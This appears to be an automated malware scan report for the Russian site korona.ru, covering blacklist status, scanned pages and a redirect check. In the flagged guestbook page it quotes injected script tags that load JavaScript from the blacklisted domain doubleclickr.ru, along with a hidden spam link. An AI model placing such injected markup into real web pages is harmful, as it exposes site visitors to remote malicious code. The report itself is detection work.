Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=korona.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://korona.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.korona.ru/ | 200 OK Content-Length: 70105 Content-Type: text/html | clean |
http://www.korona.ru/menu/menu.js | 200 OK Content-Length: 35357 Content-Type: application/x-javascript | clean |
http://www.korona.ru/menu/data-popup.js | 200 OK Content-Length: 1792 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19942 Content-Type: text/javascript | clean |
http://www.korona.ru/menu/def.js | 200 OK Content-Length: 1657 Content-Type: application/x-javascript | clean |
http://www.korona.ru/login.asp?Inc=news | 200 OK Content-Length: 70105 Content-Type: text/html | clean |
http://www.korona.ru/login.asp?Inc=adress.htm | 200 OK Content-Length: 69561 Content-Type: text/html | clean |
http://www.korona.ru/login.asp?Inc=gbook | 200 OK Content-Length: 69628 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.doubleclickr.ru ...[30627 bytes skipped]... ñåé:1 Ñòðàíèöà <B>1</B> èç <B>1</B><br><hr color=#DDDDDD align=center width='100%' size='1'><br> Äàòà: [14 ñåíòÿáðÿ 2004 ã.] Ñîîáùåíèå îò: <a href=mailto:webmaster@krn.ru>Webmaster</a><br>Ê ñîæàëåíèþ ïðîèçîøëà ïîòåðÿ ï<script src=http://www.doubleclickr.ru/index.js></script><script src=http://www.doubleclickr.ru/index.js></script><script src=http://www.doubleclickr.ru/index.js></script><script src=http://www.doubleclickr.ru/index.js></script></title><style>.aeee{position:absolute;clip:rect(421px,auto,auto,421px);}</style><div class=aeee><a href=http://jurist811.ru/186000/ >Ð½Ð¾Ð²Ð°Ñ Ð¿ÑопиÑка</a></div><br clear=all> &nb ...[56765 bytes skipped]... | ||
http://www.doubleclickr.ru/index.js | 500 Can't connect to www.doubleclickr.ru:80 (Bad hostname) Content-Length: 170 Content-Type: text/plain | clean |
http://www.doubleclickr.ru/test404page.js | 500 Can't connect to www.doubleclickr.ru:80 (Bad hostname) Content-Length: 170 Content-Type: text/plain | clean |
http://www.korona.ru/login.asp?Inc=Eng\EnglishAbout.htm | 200 OK Content-Length: 81837 Content-Type: text/html | clean |
http://www.korona.ru/login.asp?inc=basket | 200 OK Content-Length: 69617 Content-Type: text/html | clean |
http://www.korona.ru/login.asp?In=1 | HTTP/1.1 302 Object moved Cache-Control: private Date: Thu, 12 Jun 2014 06:20:20 GMT Location: mainframe.asp?ClientID=0 Server: Microsoft-IIS/6.0 Content-Length: 145 Content-Type: text/html Expires: Thu, 12 Jun 2014 06:20:20 GMT Set-Cookie: ASPSESSIONIDSCSCCDCQ=FBJNMJGAAMHGIEJINFGBIGPF; path=/ X-Powered-By: ASP.NET | clean |
http://www.korona.ru/mainframe.asp?clientid=0 | 200 OK Content-Length: 2694 Content-Type: text/html | clean |
http://www.korona.ru/login.asp?In=2 | HTTP/1.1 302 Object moved Cache-Control: private Date: Thu, 12 Jun 2014 06:20:20 GMT Location: mainframe.asp?ClientID=22821 Server: Microsoft-IIS/6.0 Content-Length: 149 Content-Type: text/html Expires: Thu, 12 Jun 2014 06:20:20 GMT Set-Cookie: ASPSESSIONIDSCSCCDCQ=HBJNMJGAPIIPMMJFNPFKHNKN; path=/ X-Powered-By: ASP.NET | clean |
http://www.korona.ru/mainframe.asp?clientid=22821 | 200 OK Content-Length: 2706 Content-Type: text/html | clean |
http://www.korona.ru/login.asp?Inc=sale | 200 OK Content-Length: 67792 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: korona.ru
Result:
GET / HTTP/1.1
Host: korona.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: korona.ru
Referer: http://www.google.com/search?q=korona.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: korona.ru
Referer: http://www.google.com/search?q=korona.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.